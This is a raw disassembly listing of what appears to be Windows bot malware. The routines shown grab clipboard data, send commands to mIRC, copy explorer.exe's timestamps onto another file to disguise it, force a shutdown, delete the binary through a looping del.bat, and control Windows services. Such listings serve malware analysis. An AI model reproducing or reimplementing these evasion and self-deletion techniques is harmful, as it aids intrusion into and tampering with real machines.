push offset aDnsapi_dllFail ; "Dnsapi.dll failed. <%d>"
push eax
call sub_414415
push esi
push edi
lea eax, [ebp+var_200]
push eax
push ebx
push [ebp+arg_0]
call sub_4056BF
add esp, 20h
loc_406541: ; CODE XREF: sub_406359+1BA�j
cmp dword_4359A0, esi
jz short loc_406575
push dword_4359A4
lea eax, [ebp+var_200]
push offset aIphlpapi_dllFa ; "Iphlpapi.dll failed. <%d>"
push eax
call sub_414415
push esi
push edi
lea eax, [ebp+var_200]
push eax
push ebx
push [ebp+arg_0]
call sub_4056BF
add esp, 20h
loc_406575: ; CODE XREF: sub_406359+1EE�j
cmp dword_4359A8, esi
jz short loc_4065A9
push dword_4359AC
lea eax, [ebp+var_200]
push offset aMpr32_dllFaile ; "Mpr32.dll failed. <%d>"
push eax
call sub_414415
push esi
push edi
lea eax, [ebp+var_200]
push eax
push ebx
push [ebp+arg_0]
call sub_4056BF
add esp, 20h
loc_4065A9: ; CODE XREF: sub_406359+222�j
cmp dword_4359B0, esi
jz short loc_4065DD
push dword_4359B4
lea eax, [ebp+var_200]
push offset aShell32_dllFai ; "Shell32.dll failed. <%d>"
push eax
call sub_414415
push esi
push edi
lea eax, [ebp+var_200]
push eax
push ebx
push [ebp+arg_0]
call sub_4056BF
add esp, 20h
loc_4065DD: ; CODE XREF: sub_406359+256�j
cmp dword_4359B8, esi
jz short loc_406611
push dword_4359BC
lea eax, [ebp+var_200]
push offset aOdbc32_dllFail ; "Odbc32.dll failed. <%d>"
push eax
call sub_414415
push esi
push edi
lea eax, [ebp+var_200]
push eax
push ebx
push [ebp+arg_0]
call sub_4056BF
add esp, 20h
loc_406611: ; CODE XREF: sub_406359+28A�j
lea eax, [ebp+var_200]
push offset aMainDllTestCom ; "[MAIN]: DLL test complete."
push eax
call sub_414415
cmp [ebp+arg_C], esi
pop ecx
pop ecx
jnz short loc_40663E
push esi
push edi
lea eax, [ebp+var_200]
push eax
push ebx
push [ebp+arg_0]
call sub_4056BF
add esp, 14h
loc_40663E: ; CODE XREF: sub_406359+2CE�j
lea eax, [ebp+var_200]
push eax
call sub_401EFF
pop ecx
pop edi
pop esi
pop ebx
leave
retn
sub_406359 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_406650 proc near ; CODE XREF: sub_4089DC+A5E�p
; sub_4089DC+A91�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push esi
push edi
mov edi, [ebp+arg_0]
xor esi, esi
cmp edi, esi
jz loc_406727
mov eax, [ebp+arg_4]
cmp eax, esi
jz loc_406727
cmp [ebp+arg_8], esi
jz loc_406727
cmp byte ptr [eax], 0
jz loc_406727
push ebx
push edi
call sub_41F397
mov ebx, eax
test ebx, ebx
pop ecx
jz loc_406722
push [ebp+arg_4]
push edi
call sub_414EE0
mov esi, eax
test esi, esi
pop ecx
pop ecx
jz short loc_40671B
sub eax, edi
push eax
push edi
push ebx
call sub_4144A0
mov eax, ebx
sub eax, edi
add esp, 0Ch
and byte ptr [eax+esi], 0
mov eax, [ebp+arg_8]
lea ecx, [eax+1]
loc_4066BD: ; CODE XREF: sub_406650+72�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_4066BD
sub eax, ecx
push eax
push [ebp+arg_8]
push ebx
call sub_4142E0
mov eax, [ebp+arg_4]
add esp, 0Ch
lea ecx, [eax+1]
loc_4066D9: ; CODE XREF: sub_406650+8E�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_4066D9
sub eax, ecx
add eax, esi
mov esi, eax
loc_4066E6: ; CODE XREF: sub_406650+9B�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_4066E6
mov edi, ebx
sub eax, esi
dec edi
loc_4066F2: ; CODE XREF: sub_406650+A8�j
mov cl, [edi+1]
inc edi
test cl, cl
jnz short loc_4066F2
mov ecx, eax
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
mov esi, [ebp+arg_0]
mov edx, esi
mov eax, ebx
sub edx, ebx
loc_406711: ; CODE XREF: sub_406650+C9�j
mov cl, [eax]
mov [edx+eax], cl
inc eax
test cl, cl
jnz short loc_406711
loc_40671B: ; CODE XREF: sub_406650+50�j
push ebx
call sub_414844
pop ecx
loc_406722: ; CODE XREF: sub_406650+3B�j
mov eax, esi
pop ebx
jmp short loc_406729
; ---------------------------------------------------------------------------
loc_406727: ; CODE XREF: sub_406650+C�j
; sub_406650+17�j ...
xor eax, eax
loc_406729: ; CODE XREF: sub_406650+D5�j
pop edi
pop esi
pop ebp
retn
sub_406650 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40672D proc near ; CODE XREF: sub_408601+C2�p
var_7D0 = dword ptr -7D0h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 7D0h
push ebx
push esi
push edi
xor eax, eax
mov ecx, 1F4h
lea edi, [ebp+var_7D0]
rep stosd
mov ecx, [ebp+arg_0]
mov eax, ecx
lea esi, [eax+1]
loc_406750: ; CODE XREF: sub_40672D+28�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_406750
sub eax, esi
xor ebx, ebx
mov edi, eax
inc ebx
cmp edi, ebx
jge short loc_406767
or eax, 0FFFFFFFFh
jmp short loc_4067C7
; ---------------------------------------------------------------------------
loc_406767: ; CODE XREF: sub_40672D+33�j
xor edx, edx
test edi, edi
mov [ebp+var_7D0], ecx
jle short loc_406787
loc_406773: ; CODE XREF: sub_40672D+58�j
mov al, [edx+ecx]
cmp al, 0Ah
jz short loc_40677E
cmp al, 0Dh
jnz short loc_406782
loc_40677E: ; CODE XREF: sub_40672D+4B�j
and byte ptr [edx+ecx], 0
loc_406782: ; CODE XREF: sub_40672D+4F�j
inc edx
cmp edx, edi
jl short loc_406773
loc_406787: ; CODE XREF: sub_40672D+44�j
xor esi, esi
test edi, edi
jle short loc_4067B1
loc_40678D: ; CODE XREF: sub_40672D+82�j
cmp byte ptr [esi+ecx], 0
jnz short loc_4067AC
lea edx, [esi+ecx+1]
cmp byte ptr [edx], 0
jz short loc_4067AC
cmp ebx, 1F4h
jge short loc_4067B1
mov [ebp+ebx*4+var_7D0], edx
inc ebx
loc_4067AC: ; CODE XREF: sub_40672D+64�j
; sub_40672D+6D�j
inc esi
cmp esi, edi
jl short loc_40678D
loc_4067B1: ; CODE XREF: sub_40672D+5E�j
; sub_40672D+75�j
mov edi, [ebp+arg_4]
test edi, edi
jz short loc_4067C5
mov ecx, 1F4h
lea esi, [ebp+var_7D0]
rep movsd
loc_4067C5: ; CODE XREF: sub_40672D+89�j
mov eax, ebx
loc_4067C7: ; CODE XREF: sub_40672D+38�j
pop edi
pop esi
pop ebx
leave
retn
sub_40672D endp
; =============== S U B R O U T I N E =======================================
sub_4067CC proc near ; CODE XREF: sub_406B7A+26�p
; sub_406BB7+79�p
arg_0 = byte ptr 4
movsx eax, [esp+arg_0]
push eax
call sub_41540C
cmp al, 61h
pop ecx
jl short loc_4067E7
cmp al, 7Ah
jg short loc_4067E7
movsx eax, al
sub eax, 60h
retn
; ---------------------------------------------------------------------------
loc_4067E7: ; CODE XREF: sub_4067CC+E�j
; sub_4067CC+12�j
xor eax, eax
retn
sub_4067CC endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4067EA proc near ; CODE XREF: sub_4089DC+2DAC�p
; sub_4089DC+392D�p
var_100 = byte ptr -100h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 100h
push esi
call ds:dword_420008 ; RtlGetLastWin32Error
push 0
push 100h
mov esi, eax
lea eax, [ebp+var_100]
push eax
push 400h
push esi
push 0
push 1200h
call ds:dword_4200A8 ; FormatMessageA
lea eax, [ebp+var_100]
loc_406823: ; CODE XREF: sub_4067EA+46�j
mov cl, [eax]
cmp cl, 1Fh
jg short loc_40682F
cmp cl, 9
jnz short loc_406832
loc_40682F: ; CODE XREF: sub_4067EA+3E�j
inc eax
jmp short loc_406823
; ---------------------------------------------------------------------------
loc_406832: ; CODE XREF: sub_4067EA+43�j
; sub_4067EA+5B�j ...
and byte ptr [eax], 0
dec eax
lea ecx, [ebp+var_100]
cmp eax, ecx
jb short loc_40684C
mov cl, [eax]
cmp cl, 2Eh
jz short loc_406832
cmp cl, 21h
jl short loc_406832
loc_40684C: ; CODE XREF: sub_4067EA+54�j
push esi
lea eax, [ebp+var_100]
push eax
push [ebp+arg_0]
mov esi, offset dword_4359C8
push offset aSErrorSD_ ; "%s Error: %s <%d>."
push 200h
push esi
call sub_41466D
add esp, 18h
mov eax, esi
pop esi
leave
retn
sub_4067EA endp
; =============== S U B R O U T I N E =======================================
sub_406874 proc near ; CODE XREF: sub_4089DC+4618�p
push esi
push 0
call dword_4357B4 ; OpenClipboard
test eax, eax
jz short loc_4068AB
push 1
call dword_435934 ; GetClipboardData
mov esi, eax
test esi, esi
jz short loc_4068AB
push edi
push esi
call ds:dword_4200B0 ; GlobalLock
push esi
mov edi, eax
call ds:dword_4200AC ; GlobalUnlock
call dword_435798 ; CloseClipboard
mov eax, edi
pop edi
pop esi
retn
; ---------------------------------------------------------------------------
loc_4068AB: ; CODE XREF: sub_406874+B�j
; sub_406874+19�j
xor eax, eax
pop esi
retn
sub_406874 endp
; =============== S U B R O U T I N E =======================================
sub_4068AF proc near ; CODE XREF: sub_4089DC+388D�p
arg_0 = dword ptr 4
push ebp
push esi
push edi
xor esi, esi
push esi
mov edi, offset aMirc_0 ; "mIRC"
push edi
call dword_435860 ; FindWindowA
mov ebp, eax
cmp ebp, esi
jz short loc_40692B
push ebx
push edi
push 1000h
push esi
push 4
push esi
push 0FFFFFFFFh
call ds:dword_4200BC ; CreateFileMappingA
push esi
push esi
push esi
mov edi, eax
push 0F001Fh
push edi
call ds:dword_4200B8 ; MapViewOfFile
push [esp+10h+arg_0]
mov ebx, eax
push ebx
call sub_414415
pop ecx
pop ecx
push esi
push 1
push 4C8h
push ebp
call dword_4358C8 ; SendMessageA
push esi
push 1
push 4C9h
push ebp
call dword_4358C8 ; SendMessageA
push ebx
call ds:dword_4200B4 ; UnmapViewOfFile
push edi
call ds:dword_42003C ; CloseHandle
xor eax, eax
inc eax
pop ebx
jmp short loc_40692D
; ---------------------------------------------------------------------------
loc_40692B: ; CODE XREF: sub_4068AF+16�j
xor eax, eax
loc_40692D: ; CODE XREF: sub_4068AF+7A�j
pop edi
pop esi
pop ebp
retn
sub_4068AF endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_406931 proc near ; CODE XREF: sub_40E6BB+21E�p
var_11C = byte ptr -11Ch
var_18 = byte ptr -18h
var_10 = byte ptr -10h
var_8 = byte ptr -8
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 11Ch
push esi
xor esi, esi
push esi
lea eax, [ebp+var_11C]
push eax
push 104h
push esi
push offset aExplorer_exe ; "explorer.exe"
push esi
call dword_435828 ; SearchPathA
test eax, eax
jz short loc_4069D2
push ebx
push edi
push esi
mov edi, 80h
push edi
push 3
push esi
mov esi, ds:dword_420044
push 1
push 80000000h
lea eax, [ebp+var_11C]
push eax
call esi ; CreateFileA
mov ebx, eax
cmp ebx, 0FFFFFFFFh
jz short loc_4069D0
lea eax, [ebp+var_18]
push eax
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_10]
push eax
push ebx
call ds:dword_4200C4 ; GetFileTime
push ebx
mov ebx, ds:dword_42003C
call ebx ; CloseHandle
push 0
push edi
push 3
push 0
push 2
push 40000000h
push [ebp+arg_0]
call esi ; CreateFileA
mov esi, eax
cmp esi, 0FFFFFFFFh
jz short loc_4069D0
lea eax, [ebp+var_18]
push eax
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_10]
push eax
push esi
call ds:dword_4200C0 ; SetFileTime
push esi
call ebx ; CloseHandle
loc_4069D0: ; CODE XREF: sub_406931+51�j
; sub_406931+87�j
pop edi
pop ebx
loc_4069D2: ; CODE XREF: sub_406931+28�j
pop esi
leave
retn
sub_406931 endp
; =============== S U B R O U T I N E =======================================
sub_4069D5 proc near ; CODE XREF: sub_4089DC+1196�p
push 1
push offset aSeshutdownpriv ; "SeShutdownPrivilege"
call sub_40815F
pop ecx
pop ecx
push 50005h
push 6
call dword_4358A0 ; ExitWindowsEx
neg eax
sbb eax, eax
neg eax
retn
sub_4069D5 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4069F7 proc near ; CODE XREF: sub_4025CE+495�p
; sub_4089DC+48CB�p
var_764 = byte ptr -764h
var_364 = byte ptr -364h
var_260 = byte ptr -260h
var_15C = byte ptr -15Ch
var_58 = dword ptr -58h
var_4C = dword ptr -4Ch
var_2C = dword ptr -2Ch
var_28 = word ptr -28h
var_14 = byte ptr -14h
var_4 = byte ptr -4
push ebp
mov ebp, esp
sub esp, 764h
push ebx
xor ebx, ebx
cmp dword_42BECC, ebx
push esi
jz short loc_406A1B
cmp dword_435968, ebx
jnz short loc_406A1B
push ebx
call sub_40213F
pop ecx
loc_406A1B: ; CODE XREF: sub_4069F7+13�j
; sub_4069F7+1B�j
lea eax, [ebp+var_764]
push eax
push 400h
call ds:dword_4200D0 ; GetTempPathA
lea eax, [ebp+var_764]
push eax
lea eax, [ebp+var_260]
push offset aSdel_bat ; "%sdel.bat"
push eax
call sub_414415
add esp, 0Ch
push ebx
push ebx
push 2
push ebx
push ebx
push 40000000h
lea eax, [ebp+var_260]
push eax
call ds:dword_420044 ; CreateFileA
mov esi, eax
cmp esi, ebx
jbe loc_406B76
lea eax, [ebp+var_260]
push eax
lea eax, [ebp+var_764]
push offset a@echoOffRepeat ; "@echo off\r\n:repeat\r\ndel \"%%1\"\r\nif exist"...
push eax
call sub_414415
lea eax, [ebp+var_764]
add esp, 0Ch
lea edx, [eax+1]
loc_406A8E: ; CODE XREF: sub_4069F7+9C�j
mov cl, [eax]
inc eax
cmp cl, bl
jnz short loc_406A8E
push edi
push ebx
lea ecx, [ebp+var_4]
push ecx
sub eax, edx
push eax
lea eax, [ebp+var_764]
push eax
push esi
call ds:dword_420040 ; WriteFile
push esi
call ds:dword_42003C ; CloseHandle
xor eax, eax
lea edi, [ebp+var_14]
stosd
stosd
stosd
push 11h
stosd
pop ecx
xor eax, eax
lea edi, [ebp+var_58]
rep stosd
mov esi, 104h
push esi
lea eax, [ebp+var_15C]
push eax
push ebx
mov [ebp+var_4C], 420AEAh
mov [ebp+var_58], 44h
mov [ebp+var_2C], 1
mov [ebp+var_28], bx
call ds:dword_4200A4 ; GetModuleHandleA
push eax
call ds:dword_420010 ; GetModuleFileNameA
lea eax, [ebp+var_15C]
push eax
call ds:dword_4200A0 ; GetFileAttributesA
cmp eax, 0FFFFFFFFh
pop edi
jz short loc_406B1F
push 80h
lea eax, [ebp+var_15C]
push eax
call ds:dword_4200CC ; SetFileAttributesA
loc_406B1F: ; CODE XREF: sub_4069F7+114�j
lea eax, [ebp+var_15C]
push eax
lea eax, [ebp+var_260]
push eax
lea eax, [ebp+var_764]
push offset aComspecCSS ; "%%comspec%% /c %s %s"
push eax
call sub_414415
add esp, 10h
push esi
lea eax, [ebp+var_364]
push eax
lea eax, [ebp+var_764]
push eax
call ds:dword_4200C8 ; ExpandEnvironmentStringsA
lea eax, [ebp+var_14]
push eax
lea eax, [ebp+var_58]
push eax
push ebx
push ebx
push 4010h
push ebx
push ebx
push ebx
lea eax, [ebp+var_364]
push eax
push ebx
call ds:dword_420038 ; CreateProcessA
loc_406B76: ; CODE XREF: sub_4069F7+6D�j
pop esi
pop ebx
leave
retn
sub_4069F7 endp
; =============== S U B R O U T I N E =======================================
sub_406B7A proc near ; CODE XREF: sub_406BB7+41�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
mov eax, [esp+arg_4]
push esi
push edi
mov edi, [esp+8+arg_8]
mov ecx, 1F4h
rep stosd
lea edi, [eax-1]
xor esi, esi
test edi, edi
jl short loc_406BB4
push ebx
mov ebx, edi
loc_406B97: ; CODE XREF: sub_406B7A+37�j
mov eax, [esp+0Ch+arg_0]
movsx eax, byte ptr [esi+eax]
push eax
call sub_4067CC
pop ecx
mov ecx, [esp+0Ch+arg_8]
inc esi
mov [ecx+eax*4], ebx
dec ebx
cmp esi, edi
jle short loc_406B97
pop ebx
loc_406BB4: ; CODE XREF: sub_406B7A+18�j
pop edi
pop esi
retn
sub_406B7A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_406BB7 proc near ; CODE XREF: sub_401FDF+10�p
; sub_402011+A0�p
var_100C = dword ptr -100Ch
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
mov eax, 100Ch
call sub_414630
mov eax, [ebp+arg_0]
lea edx, [eax+1]
loc_406BCA: ; CODE XREF: sub_406BB7+18�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_406BCA
sub eax, edx
mov [ebp+var_4], eax
mov eax, [ebp+arg_4]
lea ecx, [eax+1]
loc_406BDC: ; CODE XREF: sub_406BB7+2A�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_406BDC
push ebx
push esi
sub eax, ecx
mov esi, eax
push edi
lea eax, [ebp+var_100C]
push eax
push esi
push [ebp+arg_4]
mov [ebp+var_C], esi
call sub_406B7A
add esp, 0Ch
dec esi
mov edi, esi
jmp short loc_406C79
; ---------------------------------------------------------------------------
loc_406C05: ; CODE XREF: sub_406BB7+C4�j
mov eax, [ebp+arg_4]
movsx eax, byte ptr [esi+eax]
push eax
call sub_41540C
mov ebx, eax
mov eax, [ebp+arg_0]
movsx eax, byte ptr [edi+eax]
push eax
call sub_41540C
cmp eax, ebx
pop ecx
pop ecx
jz short loc_406C77
loc_406C27: ; CODE XREF: sub_406BB7+BE�j
mov ebx, [ebp+arg_0]
xor eax, eax
mov al, [edi+ebx]
push eax
call sub_4067CC
mov edx, [ebp+var_C]
mov eax, [ebp+eax*4+var_100C]
pop ecx
mov ecx, edx
sub ecx, esi
cmp ecx, eax
jle short loc_406C4A
mov eax, ecx
loc_406C4A: ; CODE XREF: sub_406BB7+8F�j
add edi, eax
cmp edi, [ebp+var_4]
jge short loc_406C87
mov eax, [ebp+arg_4]
lea esi, [edx-1]
movsx eax, byte ptr [esi+eax]
push eax
call sub_41540C
movsx ecx, byte ptr [edi+ebx]
push ecx
mov [ebp+var_8], eax
call sub_41540C
pop ecx
pop ecx
mov ecx, [ebp+var_8]
cmp eax, ecx
jnz short loc_406C27
loc_406C77: ; CODE XREF: sub_406BB7+6E�j
dec edi
dec esi
loc_406C79: ; CODE XREF: sub_406BB7+4C�j
test esi, esi
jg short loc_406C05
mov eax, [ebp+arg_0]
add eax, edi
loc_406C82: ; CODE XREF: sub_406BB7+D2�j
pop edi
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_406C87: ; CODE XREF: sub_406BB7+98�j
xor eax, eax
jmp short loc_406C82
sub_406BB7 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_406C8B proc near ; CODE XREF: sub_40776C+20�p
var_1C = byte ptr -1Ch
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
sub esp, 1Ch
push ebx
push edi
push 0F003Fh
xor ebx, ebx
push ebx
push ebx
call dword_4358C4 ; OpenSCManagerA
mov edi, eax
cmp edi, ebx
jnz short loc_406CB2
call ds:dword_420008 ; RtlGetLastWin32Error
mov ebx, eax
jmp short loc_406D27
; ---------------------------------------------------------------------------
loc_406CB2: ; CODE XREF: sub_406C8B+1B�j
push esi
push 0F01FFh
push [ebp+arg_4]
push edi
call dword_435940 ; OpenServiceA
mov esi, eax
cmp esi, ebx
jnz short loc_406CD2
call ds:dword_420008 ; RtlGetLastWin32Error
mov ebx, eax
jmp short loc_406D1F
; ---------------------------------------------------------------------------
loc_406CD2: ; CODE XREF: sub_406C8B+3B�j
mov eax, [ebp+arg_0]
cmp eax, 1
jz short loc_406D05
cmp eax, 3
jz short loc_406CF6
jle short loc_406D18
cmp eax, 6
jg short loc_406D18
lea eax, [ebp+var_1C]
push eax
push [ebp+arg_8]
push esi
call dword_4358E8 ; ControlService
jmp short loc_406D0C
; ---------------------------------------------------------------------------
loc_406CF6: ; CODE XREF: sub_406C8B+52�j
push [ebp+arg_10]
push [ebp+arg_C]
push esi
call dword_4358CC ; StartServiceA
jmp short loc_406D0C
; ---------------------------------------------------------------------------
loc_406D05: ; CODE XREF: sub_406C8B+4D�j
push esi
call dword_4357FC ; DeleteService
loc_406D0C: ; CODE XREF: sub_406C8B+69�j
; sub_406C8B+78�j
test eax, eax
jnz short loc_406D18
call ds:dword_420008 ; RtlGetLastWin32Error
mov ebx, eax
loc_406D18: ; CODE XREF: sub_406C8B+54�j
; sub_406C8B+59�j ...
push esi
call dword_435838 ; CloseServiceHandle
loc_406D1F: ; CODE XREF: sub_406C8B+45�j
push edi
call dword_435838 ; CloseServiceHandle
pop esi
loc_406D27: ; CODE XREF: sub_406C8B+25�j
pop edi
mov eax, ebx
pop ebx
leave
retn
sub_406C8B endp
; =============== S U B R O U T I N E =======================================
sub_406D2D proc near ; CODE XREF: sub_40776C:loc_4077B4�p
mov ecx, 420h
cmp eax, ecx
ja loc_406DDE
jz loc_406DD7
add ecx, 0FFFFFFFBh
cmp eax, ecx
ja short loc_406DA1
jz short loc_406D97
mov ecx, eax
sub ecx, 3
jz short loc_406D8D
dec ecx
dec ecx
jz short loc_406D83
dec ecx
jz short loc_406D79
sub ecx, 51h
jz short loc_406D6F
sub ecx, 24h
jnz loc_406E54 ; default
; jumptable 00406DFB cases 1,5,6,8,9,12,13,15,16
push offset aTheSpecifiedSe ; "The specified service name is invalid."
jmp loc_406E46
; ---------------------------------------------------------------------------
loc_406D6F: ; CODE XREF: sub_406D2D+2D�j
push offset aTheRequestedCo ; "The requested control code is undefined"...
jmp loc_406E46
; ---------------------------------------------------------------------------
loc_406D79: ; CODE XREF: sub_406D2D+28�j
push offset aTheHandleIsInv ; "The handle is invalid."
jmp loc_406E46
; ---------------------------------------------------------------------------
loc_406D83: ; CODE XREF: sub_406D2D+25�j
push offset aTheHandleDoesN ; "The handle does not have the required a"...
jmp loc_406E46
; ---------------------------------------------------------------------------
loc_406D8D: ; CODE XREF: sub_406D2D+21�j
push offset aTheServiceBina ; "The service binary file could not be fo"...
jmp loc_406E46
; ---------------------------------------------------------------------------
loc_406D97: ; CODE XREF: sub_406D2D+1A�j
push offset aTheServiceCann ; "The service cannot be stopped because o"...
jmp loc_406E46
; ---------------------------------------------------------------------------
loc_406DA1: ; CODE XREF: sub_406D2D+18�j
mov ecx, eax
sub ecx, 41Ch
jz short loc_406DD0
dec ecx
jz short loc_406DC9
dec ecx
jz short loc_406DC2
dec ecx
jnz loc_406E54 ; default
; jumptable 00406DFB cases 1,5,6,8,9,12,13,15,16
push offset aTheDatabaseIsL ; "The database is locked."
jmp loc_406E46
; ---------------------------------------------------------------------------
loc_406DC2: ; CODE XREF: sub_406D2D+82�j
push offset aAThreadCouldNo ; "A thread could not be created for the s"...
jmp short loc_406E46
; ---------------------------------------------------------------------------
loc_406DC9: ; CODE XREF: sub_406D2D+7F�j
push offset aTheProcessForT ; "The process for the service was started"...
jmp short loc_406E46
; ---------------------------------------------------------------------------
loc_406DD0: ; CODE XREF: sub_406D2D+7C�j
push offset aTheRequested_0 ; "The requested control code is not valid"...
jmp short loc_406E46
; ---------------------------------------------------------------------------
loc_406DD7: ; CODE XREF: sub_406D2D+D�j
push offset aAnInstanceOfTh ; "An instance of the service is already r"...
jmp short loc_406E46
; ---------------------------------------------------------------------------
loc_406DDE: ; CODE XREF: sub_406D2D+7�j
mov ecx, 45Bh
cmp eax, ecx
ja short loc_406E54 ; default
; jumptable 00406DFB cases 1,5,6,8,9,12,13,15,16
jz short loc_406E41
lea ecx, [eax-422h]
cmp ecx, 11h ; switch 18 cases
ja short loc_406E54 ; default
; jumptable 00406DFB cases 1,5,6,8,9,12,13,15,16
movzx ecx, ds:byte_406E95[ecx]
jmp ds:off_406E6D[ecx*4] ; switch jump
loc_406E02: ; DATA XREF: .text:off_406E6D�o
push offset aTheSpecifiedDa ; jumptable 00406DFB case 7
jmp short loc_406E46
; ---------------------------------------------------------------------------
loc_406E09: ; CODE XREF: sub_406D2D+CE�j
; DATA XREF: .text:off_406E6D�o
push offset aTheServiceDepe ; jumptable 00406DFB case 17
jmp short loc_406E46
; ---------------------------------------------------------------------------
loc_406E10: ; CODE XREF: sub_406D2D+CE�j
; DATA XREF: .text:off_406E6D�o
push offset aTheServiceDe_0 ; jumptable 00406DFB case 10
jmp short loc_406E46
; ---------------------------------------------------------------------------
loc_406E17: ; CODE XREF: sub_406D2D+CE�j
; DATA XREF: .text:off_406E6D�o
push offset aTheServiceHasB ; jumptable 00406DFB case 0
jmp short loc_406E46
; ---------------------------------------------------------------------------
loc_406E1E: ; CODE XREF: sub_406D2D+CE�j
; DATA XREF: .text:off_406E6D�o
push offset aTheSpecified_0 ; jumptable 00406DFB case 2
jmp short loc_406E46
; ---------------------------------------------------------------------------
loc_406E25: ; CODE XREF: sub_406D2D+CE�j
; DATA XREF: .text:off_406E6D�o
push offset aTheServiceCoul ; jumptable 00406DFB case 11
jmp short loc_406E46
; ---------------------------------------------------------------------------
loc_406E2C: ; CODE XREF: sub_406D2D+CE�j
; DATA XREF: .text:off_406E6D�o
push offset aTheServiceHa_0 ; jumptable 00406DFB case 14
jmp short loc_406E46
; ---------------------------------------------------------------------------
loc_406E33: ; CODE XREF: sub_406D2D+CE�j
; DATA XREF: .text:off_406E6D�o
push offset aTheRequested_1 ; jumptable 00406DFB case 3
jmp short loc_406E46
; ---------------------------------------------------------------------------
loc_406E3A: ; CODE XREF: sub_406D2D+CE�j
; DATA XREF: .text:off_406E6D�o
push offset aTheServiceHasN ; jumptable 00406DFB case 4
jmp short loc_406E46
; ---------------------------------------------------------------------------
loc_406E41: ; CODE XREF: sub_406D2D+BA�j
push offset aTheSystemIsShu ; "The system is shutting down."
loc_406E46: ; CODE XREF: sub_406D2D+3D�j
; sub_406D2D+47�j ...
push offset dword_435BC8
call sub_414415
pop ecx
pop ecx
jmp short loc_406E67
; ---------------------------------------------------------------------------
loc_406E54: ; CODE XREF: sub_406D2D+32�j
; sub_406D2D+85�j ...
push eax ; default
; jumptable 00406DFB cases 1,5,6,8,9,12,13,15,16
push offset aAnUnknownErr_0 ; "An unknown error occurred: <%ld>"
push offset dword_435BC8
call sub_414415
add esp, 0Ch
loc_406E67: ; CODE XREF: sub_406D2D+125�j
mov eax, offset dword_435BC8
retn
sub_406D2D endp
; ---------------------------------------------------------------------------
off_406E6D dd offset loc_406E17 ; DATA XREF: sub_406D2D+CE�r
dd offset loc_406E1E ; jump table for switch statement
dd offset loc_406E33
dd offset loc_406E3A
dd offset loc_406E02
dd offset loc_406E10
dd offset loc_406E25
dd offset loc_406E2C
dd offset loc_406E09
dd offset loc_406E54
byte_406E95 db 0, 9, 1, 2 ; DATA XREF: sub_406D2D+C7�r
db 3, 9, 9, 4 ; indirect table for switch statement
db 9, 9, 5, 6
db 9, 9, 7, 9
db 9, 8
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_406EA7 proc near ; CODE XREF: sub_4089DC+1C32�p
var_38C = byte ptr -38Ch
var_18C = byte ptr -18Ch
var_188 = byte ptr -188h
var_24 = byte ptr -24h
var_20 = byte ptr -20h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 38Ch
push ebx
push esi
push edi
xor ebx, ebx
push 0F003Fh
push ebx
push ebx
mov [ebp+var_8], ebx
call dword_4358C4 ; OpenSCManagerA
push ebx
push [ebp+arg_8]
mov [ebp+var_C], eax
push offset aTheFollowingWi ; "The following Windows services are regi"...
push [ebp+arg_4]
push [ebp+arg_0]
call sub_4056BF
add esp, 14h
loc_406EDF: ; CODE XREF: sub_406EA7+123�j
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_4]
push eax
lea eax, [ebp+var_24]
push eax
push 168h
lea eax, [ebp+var_18C]
push eax
push 3
push 30h
push [ebp+var_C]
call dword_4358D4 ; EnumServicesStatusA
test eax, eax
jnz short loc_406F19
call ds:dword_420008 ; RtlGetLastWin32Error
cmp eax, 0EAh
jnz loc_406FD0
loc_406F19: ; CODE XREF: sub_406EA7+5F�j
xor edi, edi
cmp [ebp+var_4], ebx
jle loc_406FC7
lea esi, [ebp+var_188]
loc_406F2A: ; CODE XREF: sub_406EA7+11A�j
mov eax, [esi+8]
dec eax
jz short loc_406F76
dec eax
jz short loc_406F6F
dec eax
jz short loc_406F68
dec eax
jz short loc_406F61
dec eax
jz short loc_406F5A
dec eax
jz short loc_406F53
dec eax
lea eax, [ebp+var_20]
jz short loc_406F4C
push offset aUnknown_0 ; " Unknown"
jmp short loc_406F7E
; ---------------------------------------------------------------------------
loc_406F4C: ; CODE XREF: sub_406EA7+9C�j
push offset aPaused_0 ; " Paused"
jmp short loc_406F7E
; ---------------------------------------------------------------------------
loc_406F53: ; CODE XREF: sub_406EA7+96�j
push offset aPausing ; " Pausing"
jmp short loc_406F7B
; ---------------------------------------------------------------------------
loc_406F5A: ; CODE XREF: sub_406EA7+93�j
push offset aContinuing ; " Continuing"
jmp short loc_406F7B
; ---------------------------------------------------------------------------
